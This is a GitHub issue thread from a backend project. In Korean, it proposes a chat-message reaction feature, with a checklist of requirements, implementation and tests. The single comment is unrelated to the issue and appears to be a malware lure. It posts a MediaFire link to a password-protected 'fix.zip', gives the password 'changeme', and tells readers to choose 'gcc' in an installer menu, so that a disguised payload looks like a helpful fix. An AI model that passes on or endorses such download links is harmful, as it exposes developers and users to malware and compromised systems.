### ISSUE TITLE
feat: 채팅 반응 기능 구현

### ISSUE THREAD

**Issue by Starlight258** [Attica-org/athens-backend#163]
## As-is
- 채팅에 대해 리액션을 보낼 수 없다.

## To-be 
- 채팅에 리액션으로 반응할 수 있다.

### 기대 효과
- 참여도 개선

### Todo 
- [x]  기능 요구사항, api 문서 작성, 테이블 설계
- [x]  기능 구현
- [x]  테스트

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
